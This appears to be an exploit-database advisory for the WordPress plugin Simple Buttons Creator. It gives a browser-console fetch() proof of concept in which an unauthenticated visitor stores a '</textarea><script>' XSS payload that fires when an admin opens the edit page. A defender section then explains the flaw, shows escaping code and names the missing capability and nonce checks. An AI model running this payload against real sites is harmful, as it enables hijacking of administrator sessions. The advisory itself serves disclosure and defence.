## https://sploitus.com/exploit?id=WPEX-ID:B7A35C5B-474A-444A-85EE-C50782C7A6C2
As a non-logged-in visitor, run the following in the browser console (replace `<<ANY_ID>>` with any number):
```javascript
fetch("/wp-content/plugins/simple-buttons-creator/bt-manage.php?page=sbc-new&method=post", {
"headers": {
"content-type": "application/x-www-form-urlencoded",
},
"method": "POST",
"body": 'button_id=<<ANY_ID>>&bt_name=CSRF909&bt_text=CSRF&bt_link=CSRF&bt_bg_color=CSRF&bt_txt_color=CSRF&bt_font_size=&bt_border_radius=&bt_css=</textarea><script>alert(2)</script>',
"credentials": "include"
}).then(response => response.text())
.then(data => console.log(data));
```
As an admin, go to:
https://example.com/wp-admin/admin.php?page=simple-buttons&method=edit&id=<<ANY_ID>>
and see the XSS.
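For defenders reading this: the payload works because the stored `bt_css` value is written into a `<textarea>` on the edit page without HTML escaping, so `</textarea>` ends the element early and the following `<script>` becomes live markup. The snippet below is an added example, not code from the advisory or from the plugin; the two render functions are hypothetical stand-ins for the plugin's edit page, and the payload string is constructed from the PoC above. It shows the raw concatenation beside the escaped version (the equivalent of WordPress's `esc_textarea()`), and the checks a reviewer can run on the rendered markup.

```javascript
// Added example (not from the advisory or the plugin): why the bt_css payload
// breaks out of the textarea, and the output escaping that neutralises it.
// PAYLOAD is constructed from the PoC above; the render functions are
// hypothetical stand-ins for the plugin's edit page, not its real code.
const PAYLOAD = "</textarea><script>alert(2)</script>"; // constructed sample

// HTML-escape a value for use as element text or an attribute value.
// Inside a <textarea> this is enough: the closing tag can no longer appear.
function escapeHtml(value) {
  return String(value)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#039;");
}

// Vulnerable pattern: the stored value is concatenated raw into the textarea.
function renderEditFormUnsafe(btCss) {
  return `<textarea name="bt_css">${btCss}</textarea>`;
}

// Hardened pattern: escape at the sink, so the stored value is inert text.
function renderEditFormSafe(btCss) {
  return `<textarea name="bt_css">${escapeHtml(btCss)}</textarea>`;
}

// How many </textarea> closers a parser would see: two means the element was
// closed early and whatever follows is parsed as ordinary markup.
function countTextareaClosers(html) {
  return (html.match(/<\/textarea>/gi) || []).length;
}

// Does the rendered markup contain a real <script> start tag?
function hasLiveScript(html) {
  return /<script\b/i.test(html);
}

console.log(renderEditFormUnsafe(PAYLOAD)); // two </textarea>, script tag is live
console.log(renderEditFormSafe(PAYLOAD));   // one </textarea>, payload shown as text
```

Escaping the sink fixes the XSS, but the PoC also shows the save handler accepting a POST from an unauthenticated visitor, so the plugin's write path additionally needs a capability check (`current_user_can()`) and a nonce check (`check_admin_referer()`) before any button is created or updated; that part is server-side PHP and is not shown here.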